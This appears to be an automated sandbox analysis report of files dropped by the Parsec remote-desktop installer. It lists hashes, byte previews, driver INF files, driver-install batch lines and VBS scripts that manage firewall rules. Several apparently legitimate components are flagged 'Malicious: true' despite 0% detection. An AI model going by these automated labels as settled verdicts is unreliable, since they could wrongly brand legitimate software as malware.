                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}B..9#f.9#f.9#f.r[e.3#f.r[c.#f.r[b.*#f.kVb.(#f.kVe.3#f.kVc.k#f..Vc.:#f.r[g.6#f.9#g.#f..Vo.=#f..V..8#f.9#..8#f..Vd.8#f.Rich9#f.................PE..d......d.........."......@...........f.........@.............................@......}.....`.............................................................x....p...I.......)... .......v..8....................x..(....v..8............P..8............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.data....?...0...&... ..............@....pdata...I...p...J...F..............@..@.detourc.!......."..................@..@.detourd............................@..._RDATA..............................@..@.rsrc...x...........................@..@.reloc....... ......................@..B........................................................................................................
                            Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):11858
                            Entropy (8bit):7.334407083811773
                            Encrypted:false
                            SSDEEP:192:1zQ2L1BJCdnEwKUNhYCxTBm+0U8X01k9z3AGTObrQ:1PlUNh3xTBmo8R9zNKo
                            MD5:560EFA3FA6E5AB486D958B12207AC6ED
                            SHA1:69B8EBE8AE3D9AF94886DC1C9C52FC858B5AFFAB
                            SHA-256:16DB056748CAEB3B2D6ABBF9F6C77F34DD0F81D3BBF4E65DA2EE4F2FD0B55681
                            SHA-512:A4761740090CDBA84CDA9E9A805C695567B6ED5C79AB339DA315679124B7C9F05CC0B2DE53DFB58D133CE67F30F5DDE5A20C2F2A1330C9C8F4A85ABDD674456F
                            Malicious:false
                            Preview:0..N..*.H.........?0..;...1.0...`.H.e......0.....+.....7.....r0..n0...+.....7......i.h..!M.K6..kB...240306184122Z0...+.....7.....0...0.....oX0o ...Vg...$.-. .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0.... 'Fd....#...m0cJ..0.........d..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... 'Fd....#...m0cJ..0.........d..0..........U..,...\.#.s..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0.... ...."..3..6F......$rY..T....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0U..+.....7...1G0E0...+.....7.......010...
                            Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                            File Type:Windows setup INFormation
                            Category:dropped
                            Size (bytes):1311
                            Entropy (8bit):5.255673591625164
                            Encrypted:false
                            SSDEEP:24:fWHjKOUPiE492k6StyO8rKd8tYxrCddcdg1xOjLtxlDxXL6qVt5poZQxWx00:092iEu2kmO/wYxefc61xOjLtxRxWq35y
                            MD5:AC423F3B285C615E7BEC73DC2FA71D20
                            SHA1:A508A10AD7DE55F0EC2CE9C4135CE623B773BF1D
                            SHA-256:E31AEFF7229AD9B63394FB3646F7DFDDE2EA8BBE8B247259A5A9548FE3CD89E3
                            SHA-512:FF2ECBA42697815F906D4E5501F9C4B33CD5652432DFB26302644AD385B40E361C32E0120603002D93DC12B0C38E081D5FF0CCE6145A0420BA0EE70A22FE3B07
                            Malicious:false
                            Preview:;..; Parsec Virtual DS USB filter driver for fixing UDE compatibility with USBAUDIO.SYS..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36FC9E60-C465-11CF-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvirtualds.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvirtualds.sys = 1,,....[DestinationDirs]..DefaultDestDir = 12..parsecvirtualds.DriverFiles = 12....[DefaultInstall.NTamd64]..OptionDesc = %parsecvirtualdsServiceDesc%..CopyFiles = parsecvirtualds.DriverFiles....[DefaultUninstall.NTamd64]..LegacyUninstall = 1....[parsecvirtualds.DriverFiles]..parsecvirtualds.sys....[DefaultInstall.NTamd64.Services]..AddService = %parsecvirtualdsServiceName%,,parsecvirtualds.Service....[parsecvirtualds.Service]..DisplayName = %parsecvirtualdsServiceName%..Description = %parsecvirtualdsServiceDesc%..ServiceBinary = %12%\parsecvirtualds.sys..ServiceType = 1 ; SERVICE_KERNEL_DRI
                            Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):26680
                            Entropy (8bit):6.39482709996269
                            Encrypted:false
                            SSDEEP:384:OOq45ajAwai+E3n5bWbkcBnqRTjdfHpl1eUNh3YDX+iR9zYjI:O/45al/RcVw1Hf1zH3YDuO9zyI
                            MD5:0790B2E5B9D6B38B566C6BC796F0364A
                            SHA1:1C87512273F9E98E43EA1B048A67995A93E02B4E
                            SHA-256:4B98D337ED94646D10BDB0395A29D10DCAC50C660C5176C1937A823301BD6CA1
                            SHA-512:03A8E2BE9C98385EC13CDE7EE321AB73235289DE22DEB1029B795392B90A447DFA46182D40CBBC091B39AB0DF8F5A8E9FC7A80F1D839F36EC8C678BDF746844E
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"..C..C..C..;..C..C..C..;..C..C..C..;..C..;..C.....C...5..C.....C.Rich.C.........................PE..d...o..e.........."....&.&..........p..........@....................................[.....`A.................................................q..P............P.......@..8(......<...`5..8........................... 4..@............0...............................text............................... ..h.rdata.......0......................@..H.data........@.......&..............@....pdata.......P.......(..............@..HPAGE....l....`.......*.............. ..`INIT...."....p.......4.............. ..b.rsrc................:..............@..B.reloc..<............>..............@..B........................................................................................................................................................................
                            Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):12001
                            Entropy (8bit):7.346082125667387
                            Encrypted:false
                            SSDEEP:192:0SWbYOAJCanEwKUNhYCaKJ8RwX01k9z3AmSSk:dGUNh31J9R9zvSSk
                            MD5:CFE9C8FD6FAF915A653D39895D3D0862
                            SHA1:9DAA9CAE1DB02C898EB193A47C838B834B295D01
                            SHA-256:F37FEBB98B96E9E39135ACCE723186952363C4C5BF2341C4ABE486D8580415EF
                            SHA-512:F7894C8FC7726DC0F9A9392A4607324EC52D6B7C0BDA775901741FC0CA5C13522160B67D82D690A850EC9ECC911D3C8BE31E0080A7CEFE48B5694F7EFEF75421
                            Malicious:false
                            Preview:0.....*.H..........0......1.0...`.H.e......0.....+.....7......0...0...+.....7......1.....D..G..Yc...240306184122Z0...+.....7.....0..p0.... .......~..ed.R3R.....g...w.....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... .......~..ed.R3R.....g...w.....0....S.1W.]...4 o...0R9d1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0.... T....?..}..!rL".......0.{;.~..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... T....?..}..!rL".......0.{;.~..0...../;..'%.+d`.fn..>..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b
                            Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                            File Type:Windows setup INFormation
                            Category:dropped
                            Size (bytes):3005
                            Entropy (8bit):5.435819624452916
                            Encrypted:false
                            SSDEEP:48:NhWiES6lNFCodG3NDLei7kNGZxYPZ5yL0dWe1mbBXohY25k/nMxON6wDNvn9XkI5:KioCoQ9DLei7kNGvYPZ5yL0dWUmZoxkH
                            MD5:04F8C6A4C9D90818704596FFF273AD0E
                            SHA1:F82F3B99ED2725EB2B64608D666EAF983EDE9288
                            SHA-256:54ED129DC73FB7D9A37D899E21724C22F69FE8F8BC99CAAD30197B3B107EF90B
                            SHA-512:B26D5110C459B9B51DB371387FB11AC4109019ABF085A762CB953EDCCBD34E95E6B48D9813A92218FA9AFD87AFA14057172FB1D0236E58C1ACFB13FDC3EF7501
                            Malicious:false
                            Preview:;..; parsecvusba.inf..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36fc9e60-c465-11cf-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvusba.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[DestinationDirs]..DefaultDestDir = 12..parsecvusba_Device_CoInstaller_CopyFiles = 11......[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvusba.sys = 1,,..;.....;*****************************************..; Install Section..;*****************************************....[Manufacturer]..%ManufacturerName%=Standard,NTamd64....[Standard.NTamd64]..%parsecvusba.DeviceDesc%=parsecvusba_Device, Root\Parsec\VUSBA....[parsecvusba_Device.NT]..CopyFiles=Drivers_Dir....[parsecvusba_Device.NT.hw]..AddReg=parsecvusba_Device_AddReg....; Add persisted slots key skeleton under device key..[parsecvusba_Device_AddReg]..HKR,"PersistedSlots","RestoreOnStartup",0x00010003,1..HKR,"PersistedSlots\01\ControlEndpoint",,0x00000010,..HKR,"PersistedSlots\02\Control
                            Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):263336
                            Entropy (8bit):6.416646624342821
                            Encrypted:false
                            SSDEEP:3072:xRE2rWFQ6X4P1n4rjzwpj1KCUBnN295ehsH6oGfyo55BRkGU8qwwdyk0mwvF6Vqu:7xPBSXwND+N2SEo55UVw3k0OhRD
                            MD5:591AB089C7184E33D0F4DB12B4CA5498
                            SHA1:8F45CFC643564BB1D69B6A5059C2403542AFA0F3
                            SHA-256:8FDC89A3BA70B279827B4A29B4ED22A59373FC9304DE4CCD06FD3428BFF4B0F1
                            SHA-512:D8A662EEE3D466C0A44718C4E14B1D4F65310BF84D484C7362423970C57C0DC604ECC3D5A5BCC09AD9E328E3BF1402A50D8A7414CA4EF634D8FB618CE18FC286
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ON.../w../w../w.@Wp../w..W../w.f.r../w.@Wv../w../v.N/w.@Wq../w../w../w.@Wt../w.@Ws../w.@Wr../w.f.s../w.f..../w.f.u../w.Rich./w.........PE..d...k..e.........."....&.h...t......p..........@.............................0.......R....`A....................................................x............P...........(... ......p...8...........................0...@............................................text...2........................... ..h.rdata..x:.......<..................@..H.data........0......................@....pdata.......P.......*..............@..HPAGED........p.......H.............. ..`PAGE.....w.......x...T.............. ..`INIT................................ ..b.rsrc...............................@..B.reloc....... ......................@..B................................................................................................................
                            Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                            Category:dropped
                            Size (bytes):104208
                            Entropy (8bit):7.574113550215517
                            Encrypted:false
                            SSDEEP:3072:hbG7N2kDTHUpouC0NIHo0Ym9eyOEn/y0PwqVMARM:hbE/HU60uI0YAOE/y0mARM
                            MD5:B28AE314664A7E74B8A7A83DF3002539
                            SHA1:3043970C1DA7412C4CE0CCEF44E51AB0698A338B
                            SHA-256:FA1BF84A9D14DC4026ACF706539282F5E3FE1898AF24A2465B6837903FD0158C
                            SHA-512:A36F257A455D2536E7CE3C493745284F0878DC874DCE99D4BC4778A058C7E2EDD67BD21776C7386E36D71FE00BAD1B495F6FF0CEC5838ABFB55EA3D12E8AC10D
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.................................t.....@..........................................................m...)...........................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata.......`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):327
                            Entropy (8bit):4.820064645392393
                            Encrypted:false
                            SSDEEP:6:xzKmgiItAnsKg9r/zITrId6T6UilzKmXBux3jwXvL+Hvt0zKmtcowXMEfsE1:xzAiI+sKg9bzITcdRfz3ajwXDQ0zN1wh
                            MD5:3B3CA1091EB59F0FA9ED9C9A50B3BF81
                            SHA1:BD3A9CCCD279E4FFF79AE840D6397B1E8AB8CBA0
                            SHA-256:94EE200CA574DD4499779048DB279264C872833C96A500E0F49B1342EE5F4802
                            SHA-512:8F86DB66C0BFC7E043EED738CF026ACF6AEAD862410A17FE02A2E26FDEB77B59A1162B1D67868A428F9B0C604A31963CBA8EF534B25AF1BC60448424CA6CCD1B
                            Malicious:false
                            Preview:start /wait nefconw.exe --create-device-node --hardware-id Root\Parsec\VUSBA --class-name USB --class-guid "36fc9e60-c465-11cf-8056-444553540000".start /wait nefconw.exe --install-driver --inf-path ".\parsecvusba\parsecvusba.inf".start /wait nefconw.exe --inf-default-install --inf-path ".\parsecvirtualds\parsecvirtualds.inf".
                            Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):312
                            Entropy (8bit):4.829934939966026
                            Encrypted:false
                            SSDEEP:6:xzKmuIUiItAnsKS/sWITrId6T63zKm6Bux3jwXvL+Hvt0zKmtcPwXMEfsE1:xznUiI+sK0sWITcdR3zaajwXDQ0zNOwh
                            MD5:8E8F18F9109FCC7B93B2770BE222FA53
                            SHA1:E49D59E3161E33DE73D96AD95B41A1EA979C5C06
                            SHA-256:E5A72F8064DE9B266CED03C042DAEF6BA9682CF0BA66BF8236E30E6169E88F0E
                            SHA-512:26402EC20431AC71469B6F886C00183A30F2E8F5009004B9BAD54C5A6AFDEA88AAA56E567CE048A35A76655F9AAA8D86CF69A35AA951786F8A0DA933B7F311C5
                            Malicious:false
                            Preview:start /wait nefconw.exe --remove-device-node --hardware-id Root\Parsec\VUSBA --class-guid 36fc9e60-c465-11cf-8056-444553540000.start /wait nefconw.exe --uninstall-driver --inf-path ".\parsecvusba\parsecvusba.inf".start /wait nefconw.exe --inf-default-uninstall --inf-path ".\parsecvirtualds\parsecvirtualds.inf".
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):465792
                            Entropy (8bit):5.186344682321096
                            Encrypted:false
                            SSDEEP:6144:rkdyuNAbS9p400tm61bXdCwx+3y6kR1DnjvGms7X5od0:rkUuNAbS9p9cx1rdCwh6+/+msjmd0
                            MD5:62BEB668110B4C5DDAD09BB20D921CB6
                            SHA1:F3706372C01D1E607FF8C605307DE6EF2C26C1A4
                            SHA-256:6F1BE9E26E403A885CC3B1FF0E4DBECBC96C0821119D25990C3E211564F215D5
                            SHA-512:8994C3F1C78B0A816ECF30E463AF8D6DDFD0A0CE7B962CBF13E9BBD360D37A024B8EE69C76745F4C332A4786DBFB9216667B1D03C32C60A7C06E85359A2186EE
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......'...c.]c.]c.]j..]a.]...\b.]...\R.]c.]%.]...\..]...\d.]...\v.]1..\K.]1..\p.]1..\d.]...\C.]...\f.]..c]b.]c..]a.]...\b.]Richc.]........................PE..d.....7e.........."......J..........(..........@.............................P............`..................................................P...........n...............)...@......0...........................(...P...8............`...............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data....2...`.......L..............@....pdata...............Z..............@..@_RDATA...............x..............@..@.rsrc....n.......p...z..............@..@.reloc.......@......................@..B................................................................................................................................................................
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):418696
                            Entropy (8bit):4.95147545386253
                            Encrypted:false
                            SSDEEP:6144:qaoZkv+B1x9heMY32Z4iZDzDJGjvGms7X5Hm:4Zkv+B1x9cMu2ZzS+msjZ
                            MD5:46CD3FC327AF9109BD143BA7F16DF397
                            SHA1:53D2A6BCF0D21168050B852E287C2EF62F52F909
                            SHA-256:5A699A165838C739E449AC19A52E0A05B841BCEE1A27F7D348F0DD04C8E277A3
                            SHA-512:D6E35F0DD4F6EF259DD7040D80CD469F27EB460836A4C767D40678CE82B46CE4C38B329C0CF3B41236CEA2F0333F94669CFBEF05EF484D91035F52AD4C1A5CA3
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........."R.tL..tL..tL......tL.2.J..tL.2.M..tL..tM..uL.2.I.TtL.2.O..tL.2.H..tL...I..tL...H..tL...O..tL.).H..tL.).D..tL.)....tL..t...tL.).N..tL.Rich.tL.........PE..d.....7e..........".................Pk.........@.....................................J....`.................................................L........0...f...........:...)..........Ld.......................f..(...pd..8...............@............................text... ........................... ..`.rdata..............................@..@.data...@2..........................@....pdata..............................@..@_RDATA....... ......................@..@.rsrc....f...0...h..................@..@.reloc...............2..............@..B................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):155
                            Entropy (8bit):4.964195012666818
                            Encrypted:false
                            SSDEEP:3:3FFgNicHnIhoF1ExnRGTAWAJlBRoWdxETzqSHXCF8K/NkPUAA6An:3FFgN/HIaOxnR8VAPBRiqfGomTA6An
                            MD5:2C669AF7EE4ADEDDF72FA0102AA0378D
                            SHA1:5FCDF2480946EEF8F55DAA2DF5522508E45DECCD
                            SHA-256:CD5D52066766B7F0FD7222E551A96C539F17C72DEBD32F8DA9F76DF4627A6DD5
                            SHA-512:553CAECE520111CAB22BB8E92099A2976ACD7F2DC8C8766227F8D64259CC9E3104ADF1B10019B25EDB3A05B92A64AFE5466C661F88BF33F2ECACDA4FE6EDC32F
                            Malicious:false
                            Preview:{.. "entry_symbol": "wx_main",.. "hash": "b43debe8105cfd4e2c8f81599497ad4ad38640f19a64f9e530e7d2f64662bf6d",.. "so_name": "parsecd-150-93b.dll"..}
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):3445128
                            Entropy (8bit):6.632135432033706
                            Encrypted:false
                            SSDEEP:49152:UWvLIUXeaP9CAYaXaAndGk4L8jTMFv43/ruceDSbsRCy9uzY9eQoYVe0OUrVxkov:0I0jNdLrpEeD+vqBlMe
                            MD5:1FF3E1349EDD37A206A97943731045C4
                            SHA1:6D1CFC0C0B26191385CB27149433E743B74D479A
                            SHA-256:B43DEBE8105CFD4E2C8F81599497AD4AD38640F19A64F9E530E7D2F64662BF6D
                            SHA-512:80F91692C22587E76E26C7CA38B267493D4598BCE75E284B3FEF4EF03C64EF8BA91D67BB7BE2BDDD9624E4AA52A67BDEB4B5EAC3A86A31529BB18C44F5824FE6
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...................................`...........!..L.!This program cannot be run in DOS mode....$...........Mx..Mx..Mx..D.Z.Ox......Lx.......x..Mx...z......x......lx......jx..Mx..Lx..K...+x..K...]x..K...[x......Nx......Nx.....Xx......Ax......Lx.......x..j...Gx.. ...xx.. ...5x.. ...Lx.. .6.Lx..Mx^.Ox.. ...Lx..RichMx..........PE..d...X..e.........." ...&.\....................................................5......4...`......................................... $/.h....$/......02..n....0.|1...h4..)....5.h....A-......................C-.(....@-.@............p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....1...`/..0...P/.............@....pdata..|1....0..2..../.............@..@.detourc.!....1.."....0.............@..@.detourd......2.......0.............@..._RDATA..0.... 2.......0.............@..@.rsrc....n...02..p....0.............@..@.reloc..h.....5......R4.............@..B........................
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):350968
                            Entropy (8bit):5.604356925971176
                            Encrypted:false
                            SSDEEP:6144:GAR9duE83BYjyEbU1SDgFg8EwkSdbAxD22y6jvGmp:H9gp3WjyEbU1SDAgJw40c+mp
                            MD5:FAA24223985ABFBF64E4DDCD43F062D3
                            SHA1:E1374DC7C98405EFC5A44AA3229B97EABDD69BB2
                            SHA-256:6DC71B2E92B770DCFECA4A32C8F1787210311F731F1124754DF193EC22D5D13E
                            SHA-512:23324AFCB51508F5EA3F120A5787B150A8226D677C5A55FEF219674B4D619FD0D7300D2B4CAD917864D5F54788B9C8546DB2A77AA4F0D666A956014169C4A6C9
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{'Z\.I.\.I.\.I..hO.].I..hH.G.I.\.H...I..hL...I..hJ.[.I..hM.S.I..oL.t.I..oM.O.I..oJ.[.I..oM.I.I..o..].I.\...].I..oK.].I.Rich\.I.........................PE..d.....bb.........."......`..........@t.........@....................................V.....`.................................................tM..x.......0....... ....:... ......................................(.......8............p..P............................text... _.......`.................. ..`.rdata.......p.......d..............@..@.data...h/...`.......N..............@....pdata.. ............\..............@..@_RDATA...............z..............@..@.rsrc...0............|..............@..@.reloc...............2..............@..B................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                            Category:dropped
                            Size (bytes):174136
                            Entropy (8bit):5.0044183901933215
                            Encrypted:false
                            SSDEEP:1536:Gg/T2X/jN2vxZz0DTHUpouk9pbZ3yFu1/s+ZLGmRTQ3E64xE+1x7wWNx:GgbG7N2kDTHUpoukTi+hGmRHxPxMW
                            MD5:FD4427B781E0DCB86E2FBC84BF000B36
                            SHA1:2A4F6C058D137F02D3A2E5D0A8E2A0A4C70EF81D
                            SHA-256:99864EAE2AD9B58075D0F4B2B3CF5B68BC35FE9E187B8695791F041C1335D5F1
                            SHA-512:EF593E0F7286ABFA1F0FE090CACAF4854F31B07E5A0DD39A87B87A4E28BFDC5A45A6A8406DF0578C503560BF5449CFDD65358EAA89C8E8BB7B64475E70DF09D3
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.......................... ............@..........................................P..X............~...)...........................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata.......`...........................rsrc...X....P......................@..@................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                            Category:dropped
                            Size (bytes):517256
                            Entropy (8bit):7.9435707600028005
                            Encrypted:false
                            SSDEEP:12288:QbLQNEFqf6MouZQqdF9zuAkDjdCjXHSZz2AKhAOYYA:QbUNEFKXrZ6ZjdFZxKhAOYv
                            MD5:4B9A3048286692A865187013B70F44E8
                            SHA1:EEFE91D9702314341ACCCD828FE4EDB6EE570D7B
                            SHA-256:E23332448FDAF5AA017CB308DB5EF6855FAC526A7DED05D80C039404126D5362
                            SHA-512:A38B9A0A1626D9F40FF2C718717A793108C7E773B25493CC53C595E6B9840CC4DE66587549F43CE00569B368834327184A90D55DA3C4AE0E269E1D0EDEF6238D
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@..................................D....@..............................................................)...........................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata.......`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                            Category:dropped
                            Size (bytes):907184
                            Entropy (8bit):7.983961364658659
                            Encrypted:false
                            SSDEEP:24576:Ib45b9QaRG2zB9aKXrZ6bcmH0q8qHFael5:CsuWGcjLzmUaHX
                            MD5:2D009D446A0BA83EC2F12242F7ED126C
                            SHA1:7E5346787E8950A8B3F17FB3F527E0F80055F059
                            SHA-256:436088A5EB416935D7BD452E4E53123C2E65B737EAB7D98EBE1913618F95E61B
                            SHA-512:1A3E761F5CB3AD8B4979D60D197AB5FF75929408DDB065080D687BE02A33058A953DFCB8F01E5B87332FE54CF578BED191122E57BB2F0D2FCF7A6874DFAF8A57
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.................................;.....@.........................................................(....)...........................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata.......`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):307
                            Entropy (8bit):4.83986109060373
                            Encrypted:false
                            SSDEEP:6:jeUicmAN+7ysIkgOr39TksxYOpLzLYHHiRXZawuxAWFTOuJ85LLn:ixc3AAjA39TXppmHy0wBC6uJ8t
                            MD5:882374285898F16B5F9FF44AFC1AE701
                            SHA1:31C9445557C9B8ECDA1F0A6D5FF666E01DD1C3CA
                            SHA-256:0BE5AA5CC6395A86878F56B131E13DB4908E48F06E892FF8F8CF9E2D3B6C8ABB
                            SHA-512:3B05158B03B57A4D2CBFEE9CEF6ADFE973D080264A88E5CDEB85C59B567529CD1CD2A3B5D8538CB8637D140FD8691DC8826388AB669B7BFB2D5C1C4174069243
                            Malicious:false
                            Preview:Set sh = CreateObject("Wscript.Shell").Set fs = CreateObject("Scripting.FileSystemObject").Dim args.Dim path..path = Wscript.Arguments(0)..args = "netsh.exe advfirewall firewall add rule name=Parsec dir=in action=allow program=""" & path & """ enable=yes profile=public,private,domain".sh.Run args, 0, true.
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):367
                            Entropy (8bit):4.612954361510431
                            Encrypted:false
                            SSDEEP:6:jeUicmAN+7ysRT/mivYOLLLv8T/mivYTq7Lv8T/mivY1q7Ln:ixc3ApT/mivpLv8T/miviI8T/mivf
                            MD5:5D4D70CDF36FCDAA292DA1DA9133320C
                            SHA1:92DC18D3D1128D43F482AB56804136C687B00713
                            SHA-256:75F1DECE4FDA689A907F6D74B513ADB0C1771C1B79EA71160179542C9C4AB2F0
                            SHA-512:B54C92FBECB10DDF66D1B7AD950FFBC13F504C71081A8BD56C28C5689A2BF19BD81B467E0697C38F140C72A273EB9EB837105E738C6F1AC4F43344E2AB521778
                            Malicious:false
                            Preview:Set sh = CreateObject("Wscript.Shell").Set fs = CreateObject("Scripting.FileSystemObject").Dim args..args = "netsh.exe advfirewall firewall delete rule name=Parsec".sh.Run args, 0, true..args = "netsh.exe advfirewall firewall delete rule name=parsec.exe".sh.Run args, 0, true..args = "netsh.exe advfirewall firewall delete rule name=parsecd.exe".sh.Run args, 0, true.
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):115
                            Entropy (8bit):4.642094539330562
                            Encrypted:false
                            SSDEEP:3:jeYcRm81GX7Z9HCCoOWuu5G3RKLfObvn:jeUi+4uu5GcyLn
                            MD5:C78520C3162C1962F3164714B37EB4D0
                            SHA1:67C19B8AEA7AD99465976DBCD3EFCFDD7D62E3FE
                            SHA-256:DEA38BD553ABE93C689DE42D0220ADD18F9BE3E3D2FA53F97EB8649F586DF4F3
                            SHA-512:CFBFC2C7DD8019F98B77E8881680EF9D0135A210FB9B0136A4992C236D971E247AA1641CD2EAFDC5F6F5BB61002B30EA14B226127C4CEF04F3B3D6BE3A941FCC
                            Malicious:false
                            Preview:Set sh = CreateObject("Wscript.Shell").Dim args..args = "schtasks /delete /tn ParsecTeams /f".sh.Run args, 0, true.
